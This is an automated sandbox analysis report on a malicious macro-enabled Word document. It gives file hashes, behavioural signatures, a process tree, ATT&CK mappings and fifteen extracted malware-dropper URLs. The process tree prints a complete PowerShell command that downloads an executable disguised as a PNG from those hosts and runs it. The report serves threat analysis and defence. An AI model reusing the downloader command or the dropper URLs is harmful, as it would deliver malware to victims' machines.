Overview

overview

10

Static

static

8

DieKlage-0...4.docm

windows7_x64

10

DieKlage-0...4.docm

windows10-2004_x64

10

Analysis

  • max time kernel
    104s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-05-2022 03:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DieKlage-01092020-1994462004.docm

  • Size

    90KB

  • MD5

    09c2efc28d71216d95c49b33f24af6e3

  • SHA1

    b8b3a9a39486c91222494004ef2498e977ad7524

  • SHA256

    94027e02da7382882c8046e165ba9bdf7b3fc801ecf35ab3f004b1a3fdcc743c

  • SHA512

    be8158bcb2a6adccffd5d5486b0d4c51463df654d017e0ca58466a9d46c9c23a9811200779333d803933c402c8f660200db1e7c5c89796c83e1c4f3ed9ab67a3

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://rodrigodecamargo.com.br/vhtderi/555555555.png
exe.dropper

http://www.lelamantin.fr/uboljzeqfb/555555555.png
exe.dropper

http://somethingspecialrd.com/emdnfin/555555555.png
exe.dropper

http://www.intiming.it/zopnivucop/555555555.png
exe.dropper

http://funminews.com/tdtmxmcjtkqo/555555555.png
exe.dropper

http://lesehanpelangi.com/vswrdyzgo/555555555.png
exe.dropper

http://anamtaexports.in/gbfrctzj/555555555.png
exe.dropper

http://ebooks.libraryrule.com/ttfzyugewvft/555555555.png
exe.dropper

http://the-lobby.org/xqjzx/555555555.png
exe.dropper

http://www.biocosmeticashop.com/tftkbe/555555555.png
exe.dropper

http://birlafincorp.com/xoygkcfaea/555555555.png
exe.dropper

http://shainasaw.com/bvjlok/555555555.png
exe.dropper

http://www.hygienicwallcladding.com/ucbucwmtfkan/555555555.png
exe.dropper

http://marudhralive.com/ggyofqrt/555555555.png
exe.dropper

http://dienmayhoatan.com/fmyctrjeqrxw/555555555.png

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DieKlage-01092020-1994462004.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3092
    • C:\Windows\explorer.exe
      explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
      2⤵
      • Process spawned unexpected child process
      PID:1988
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:544
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4796
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell Foreach($url in @('http://rodrigodecamargo.com.br/vhtderi/555555555.png','http://www.lelamantin.fr/uboljzeqfb/555555555.png','http://somethingspecialrd.com/emdnfin/555555555.png','http://www.intiming.it/zopnivucop/555555555.png','http://funminews.com/tdtmxmcjtkqo/555555555.png','http://lesehanpelangi.com/vswrdyzgo/555555555.png','http://anamtaexports.in/gbfrctzj/555555555.png','http://ebooks.libraryrule.com/ttfzyugewvft/555555555.png','http://the-lobby.org/xqjzx/555555555.png','http://www.biocosmeticashop.com/tftkbe/555555555.png','http://birlafincorp.com/xoygkcfaea/555555555.png','http://shainasaw.com/bvjlok/555555555.png','http://www.hygienicwallcladding.com/ucbucwmtfkan/555555555.png','http://marudhralive.com/ggyofqrt/555555555.png','http://dienmayhoatan.com/fmyctrjeqrxw/555555555.png')) { try{$path = 'C:\ApplesHelper\KLHutufguyguyfgxdfg.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2656

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmd
    Filesize

    24KB

    MD5

    db94c28610cb83c3056f1ae4e3e80463

    SHA1

    174cb2cc87ff32c50b752a94eda80121811014bd

    SHA256

    72223739a61890dac3cef9147aaa16b447d977cdf6ee413535a2826931db2b2d

    SHA512

    f94ec877c58b4c5aa503e2fff42deb8925c17d7fddbf4d10e4856b2254dc81117d0f9a1ec21ed4444a3e90d2c28e86fd1e776448f3aa80cb8977ca7021cb85e9

    Download Submit
  • C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
    Filesize

    74KB

    MD5

    5ba27fb265515da4386aa9c025826e3a

    SHA1

    16a4dfd513bd36714e560a3fcca8c3b846e2da57

    SHA256

    f9655447610215ddd56d097ea5bdeaaa1f7a730d66945c0cc86d8de51c5bb15e

    SHA512

    977e4954d5ec90f2306d34f95fc4898e1309f1272306c3e70616738ef49eb1f53b8689580d8ddffa677f02b68ba90ef4f0ad45456a4e27ac9367f284823819b3

    Download Submit
  • memory/1300-142-0x0000000000000000-mapping.dmp
    Download
  • memory/1988-138-0x0000000000000000-mapping.dmp
    Download
  • memory/2656-146-0x00007FFD358A0000-0x00007FFD36361000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2656-145-0x00000222A4F40000-0x00000222A4F62000-memory.dmp
    Filesize

    136KB

    Download
  • memory/2656-144-0x0000000000000000-mapping.dmp
    Download
  • memory/3092-135-0x00007FFD1E400000-0x00007FFD1E410000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3092-137-0x000001980EA10000-0x000001980EA14000-memory.dmp
    Filesize

    16KB

    Download
  • memory/3092-136-0x00007FFD1E400000-0x00007FFD1E410000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3092-130-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3092-134-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3092-133-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3092-131-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3092-132-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3092-147-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3092-149-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3092-148-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3092-150-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/4796-141-0x0000000000000000-mapping.dmp
    Download